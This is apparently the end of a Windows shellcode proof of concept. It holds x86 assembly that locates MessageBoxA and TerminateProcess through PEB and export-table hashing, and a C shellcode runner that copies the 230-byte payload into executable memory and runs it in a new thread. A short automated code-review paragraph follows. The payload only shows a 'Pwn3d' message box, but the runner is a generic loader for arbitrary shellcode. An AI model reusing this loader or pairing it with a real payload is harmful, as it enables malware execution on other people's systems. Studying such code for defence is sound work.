push esp ; Stack = &("Pwn3d by h4pp1n3ss")
mov ebx, [esp] ; EBX = &(push_inst_greetings)
xor eax, eax ; EAX = NULL
push eax ; uType
push ebx ; lpCaption
push ebx ; lpText
push eax ; hWnd
call dword [ebp+0x18] ; Call MessageBoxA
call_TerminateProcess:
xor eax, eax ; EAX = null
push eax ; uExitCode
push 0xffffffff ; hProcess
call dword [ebp+0x14] ; Call TerminateProcess
[!]===================================== POC ========================================= [!]
/*
Shellcode runner author: reenz0h (twitter: @sektor7net)
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// Our MessageBoxA shellcode
unsigned char payload[] =
"\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b"
"\x76\x1c\x8b\x5e\x08\x8b\x7e\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06"
"\x5e\x89\x75\x04\xeb\x54\xe8\xf5\xff\xff\xff\x60\x8b\x43\x3c\x8b\x7c\x03"
"\x78\x01\xdf\x8b\x4f\x18\x8b\x47\x20\x01\xd8\x89\x45\xfc\xe3\x36\x49\x8b"
"\x45\xfc\x8b\x34\x88\x01\xde\x31\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca"
"\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x24\x75\xdf\x8b\x57\x24\x01\xda\x66\x8b"
"\x0c\x4a\x8b\x57\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89\x44\x24\x1c\x61\xc3"
"\x68\x8e\x4e\x0e\xec\xff\x55\x04\x89\x45\x10\x68\x83\xb9\xb5\x78\xff\x55"
"\x04\x89\x45\x14\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32\x2e\x64\x68\x55"
"\x73\x65\x72\x54\xff\x55\x10\x89\xc3\x68\xa8\xa2\x4d\xbc\xff\x55\x04\x89"
"\x45\x18\x31\xc0\x66\xb8\x73\x73\x50\x68\x70\x31\x6e\x33\x68\x20\x68\x34"
"\x70\x68\x64\x20\x62\x79\x68\x50\x77\x6e\x33\x54\x8b\x1c\x24\x31\xc0\x50"
"\x53\x53\x50\xff\x55\x18\x31\xc0\x50\x6a\xff\xff\x55\x14";
unsigned int payload_len = 230;
int main(void) {
void * exec_mem;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
// Allocate a memory buffer for payload
exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// Copy payload to new buffer
RtlMoveMemory(exec_mem, payload, payload_len);
// Make new buffer as executable
rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
printf("\nHit me!\n");
printf("Shellcode Length: %d\n", strlen(payload));
getchar();
// If all good, run the payload
if ( rv != 0 ) {
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
WaitForSingleObject(th, -1);
}
return 0;
}
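Review bot: the same file-layout and runner issues as the WinExec listing apply here: assembly and C share one file behind a `[!]== POC ==[!]` banner, `printf("%d", strlen(payload))` mismatches `size_t`, `WaitForSingleObject(th, -1)` should use `INFINITE`, and the `VirtualAlloc` and `CreateThread` results are never checked. The stores to `[ebp+0x04]`, `[ebp+0x10]`, `[ebp+0x14]` and `[ebp+0x18]` again sit above the entry stack pointer in the caller's frame, which should be documented as a requirement that the code start in a fresh thread frame. The `lpText` and `lpCaption` arguments are deliberately the same pointer (`push ebx` twice); a one-word comment would prevent readers from reading it as a copy-paste slip. Minor: the `;;` produced by lines such as `mov ax, 0x6c6c;` followed by a comment is harmless but untidy, "pop a MessageBox and show" should read "pops a MessageBox and shows", and the title says "Export Address Table" where the WinExec listing says "Export Directory Table" for the same structure; pick one name.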